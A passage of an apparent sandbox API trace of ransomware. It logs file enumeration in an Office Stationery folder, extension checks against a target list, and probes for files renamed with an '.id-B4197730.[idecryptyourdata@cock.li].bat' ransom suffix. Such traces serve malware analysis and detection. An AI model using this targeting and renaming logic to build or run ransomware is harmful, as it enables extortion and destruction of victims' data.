shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".zip") returned 4 [0056.769] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString=".rar") returned 4 [0056.769] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.770] lstrlenW (lpString=".bz2") returned 4 [0056.770] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.770] lstrlenW (lpString=".7z") returned 3 [0056.770] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.770] lstrlenW (lpString=".dbf") returned 4 [0056.770] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.770] lstrlenW (lpString=".1cd") returned 4 [0056.770] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.770] lstrlenW (lpString=".jpg") returned 4 [0056.770] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.771] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0056.771] lstrlenW (lpString="Peacock.htm") returned 11 [0056.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.781] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=232) returned 1 [0056.781] CloseHandle (hObject=0x344) returned 1 [0056.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0x20 [0056.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.781] lstrlenW (lpString=".doc") returned 4 [0056.781] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.781] lstrlenW (lpString=".docx") returned 5 [0056.781] lstrcmpiW (lpString1=".docx", lpString2="k.htm") returned -1 [0056.781] lstrlenW (lpString=".pdf") returned 4 [0056.782] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString=".xls") returned 4 [0056.782] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString=".xlsx") returned 5 [0056.782] lstrcmpiW (lpString1=".xlsx", lpString2="k.htm") returned -1 [0056.782] lstrlenW (lpString=".ppt") returned 4 [0056.782] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString=".zip") returned 4 [0056.782] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString=".rar") returned 4 [0056.782] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString=".bz2") returned 4 [0056.782] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.782] lstrlenW (lpString=".7z") returned 3 [0056.782] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString=".dbf") returned 4 [0056.782] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString=".1cd") returned 4 [0056.782] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString=".jpg") returned 4 [0056.782] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.782] lstrlenW (lpString=".doc") returned 4 [0056.782] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.782] lstrlenW (lpString=".docx") returned 5 [0056.782] lstrcmpiW (lpString1=".docx", lpString2="k.htm") returned -1 [0056.782] lstrlenW (lpString=".pdf") returned 4 [0056.783] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.783] lstrlenW (lpString=".xls") returned 4 [0056.783] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.783] lstrlenW (lpString=".xlsx") returned 5 [0056.783] lstrcmpiW (lpString1=".xlsx", lpString2="k.htm") returned -1 [0056.783] lstrlenW (lpString=".ppt") returned 4 [0056.783] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.783] lstrlenW (lpString=".zip") returned 4 [0056.783] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.783] lstrlenW (lpString=".rar") returned 4 [0056.783] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.783] lstrlenW (lpString=".bz2") returned 4 [0056.783] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.783] lstrlenW (lpString=".7z") returned 3 [0056.783] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.783] lstrlenW (lpString=".dbf") returned 4 [0056.783] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.783] lstrlenW (lpString=".1cd") returned 4 [0056.783] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 69 [0056.783] lstrlenW (lpString=".jpg") returned 4 [0056.783] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.784] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0056.784] lstrlenW (lpString="Roses.htm") returned 9 [0056.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.793] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=233) returned 1 [0056.793] CloseHandle (hObject=0x344) returned 1 [0056.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0056.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".doc") returned 4 [0056.794] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.794] lstrlenW (lpString=".docx") returned 5 [0056.794] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0056.794] lstrlenW (lpString=".pdf") returned 4 [0056.794] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString=".xls") returned 4 [0056.794] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString=".xlsx") returned 5 [0056.794] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0056.794] lstrlenW (lpString=".ppt") returned 4 [0056.794] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".zip") returned 4 [0056.794] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString=".rar") returned 4 [0056.794] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString=".bz2") returned 4 [0056.794] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.794] lstrlenW (lpString=".7z") returned 3 [0056.794] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".dbf") returned 4 [0056.794] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".1cd") returned 4 [0056.794] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".jpg") returned 4 [0056.794] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.794] lstrlenW (lpString=".doc") returned 4 [0056.794] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.794] lstrlenW (lpString=".docx") returned 5 [0056.795] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0056.795] lstrlenW (lpString=".pdf") returned 4 [0056.795] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.795] lstrlenW (lpString=".xls") returned 4 [0056.795] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.795] lstrlenW (lpString=".xlsx") returned 5 [0056.795] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0056.795] lstrlenW (lpString=".ppt") returned 4 [0056.795] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.795] lstrlenW (lpString=".zip") returned 4 [0056.795] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.795] lstrlenW (lpString=".rar") returned 4 [0056.795] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.795] lstrlenW (lpString=".bz2") returned 4 [0056.795] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.795] lstrlenW (lpString=".7z") returned 3 [0056.795] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.795] lstrlenW (lpString=".dbf") returned 4 [0056.795] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.795] lstrlenW (lpString=".1cd") returned 4 [0056.795] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0056.795] lstrlenW (lpString=".jpg") returned 4 [0056.795] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.795] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.795] lstrlenW (lpString="Roses.jpg") returned 9 [0056.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.802] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=1920) returned 1 [0056.802] CloseHandle (hObject=0x2e4) returned 1 [0056.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0056.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.802] lstrlenW (lpString=".doc") returned 4 [0056.802] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.802] lstrlenW (lpString=".docx") returned 5 [0056.802] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.802] lstrlenW (lpString=".pdf") returned 4 [0056.802] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.802] lstrlenW (lpString=".xls") returned 4 [0056.802] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.803] lstrlenW (lpString=".xlsx") returned 5 [0056.803] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.803] lstrlenW (lpString=".ppt") returned 4 [0056.803] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString=".zip") returned 4 [0056.803] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.803] lstrlenW (lpString=".rar") returned 4 [0056.803] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.803] lstrlenW (lpString=".bz2") returned 4 [0056.803] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.803] lstrlenW (lpString=".7z") returned 3 [0056.803] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString=".dbf") returned 4 [0056.803] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString=".1cd") returned 4 [0056.803] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString=".jpg") returned 4 [0056.803] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.803] lstrlenW (lpString=".doc") returned 4 [0056.803] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.803] lstrlenW (lpString=".docx") returned 5 [0056.803] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.803] lstrlenW (lpString=".pdf") returned 4 [0056.803] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.803] lstrlenW (lpString=".xls") returned 4 [0056.804] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.804] lstrlenW (lpString=".xlsx") returned 5 [0056.804] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.804] lstrlenW (lpString=".ppt") returned 4 [0056.804] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.804] lstrlenW (lpString=".zip") returned 4 [0056.804] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.804] lstrlenW (lpString=".rar") returned 4 [0056.804] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.804] lstrlenW (lpString=".bz2") returned 4 [0056.804] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.804] lstrlenW (lpString=".7z") returned 3 [0056.804] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.804] lstrlenW (lpString=".dbf") returned 4 [0056.804] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.804] lstrlenW (lpString=".1cd") returned 4 [0056.804] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0056.804] lstrlenW (lpString=".jpg") returned 4 [0056.804] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.804] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.804] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0056.804] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.812] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4734) returned 1 [0056.812] CloseHandle (hObject=0x2e4) returned 1 [0056.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0x20 [0056.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.813] lstrlenW (lpString=".doc") returned 4 [0056.813] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.813] lstrlenW (lpString=".docx") returned 5 [0056.813] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1 [0056.813] lstrlenW (lpString=".pdf") returned 4 [0056.813] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.813] lstrlenW (lpString=".xls") returned 4 [0056.813] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.813] lstrlenW (lpString=".xlsx") returned 5 [0056.813] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1 [0056.813] lstrlenW (lpString=".ppt") returned 4 [0056.813] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString=".zip") returned 4 [0056.814] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.814] lstrlenW (lpString=".rar") returned 4 [0056.814] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.814] lstrlenW (lpString=".bz2") returned 4 [0056.814] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.814] lstrlenW (lpString=".7z") returned 3 [0056.814] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString=".dbf") returned 4 [0056.814] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString=".1cd") returned 4 [0056.814] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString=".jpg") returned 4 [0056.814] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.814] lstrlenW (lpString=".doc") returned 4 [0056.814] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.814] lstrlenW (lpString=".docx") returned 5 [0056.814] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1 [0056.814] lstrlenW (lpString=".pdf") returned 4 [0056.814] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.814] lstrlenW (lpString=".xls") returned 4 [0056.814] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.814] lstrlenW (lpString=".xlsx") returned 5 [0056.814] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1 [0056.814] lstrlenW (lpString=".ppt") returned 4 [0056.814] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.815] lstrlenW (lpString=".zip") returned 4 [0056.815] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.815] lstrlenW (lpString=".rar") returned 4 [0056.815] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.815] lstrlenW (lpString=".bz2") returned 4 [0056.815] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.815] lstrlenW (lpString=".7z") returned 3 [0056.815] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.815] lstrlenW (lpString=".dbf") returned 4 [0056.815] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.815] lstrlenW (lpString=".1cd") returned 4 [0056.815] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0056.815] lstrlenW (lpString=".jpg") returned 4 [0056.815] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.816] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.816] lstrlenW (lpString="Stars.jpg") returned 9 [0056.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.817] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=7505) returned 1 [0056.817] CloseHandle (hObject=0x2e4) returned 1 [0056.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0x20 [0056.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0056.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0056.817] lstrlenW (lpString=".doc") returned 4 [0056.817] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.818] lstrlenW (lpString=".docx") returned 5 [0056.818] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.818] lstrlenW (lpString=".pdf") returned 4 [0056.818] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.818] lstrlenW (lpString=".xls") returned 4 [0056.818] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.818] lstrlenW (lpString=".xlsx") returned 5 [0056.818] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.818] lstrlenW 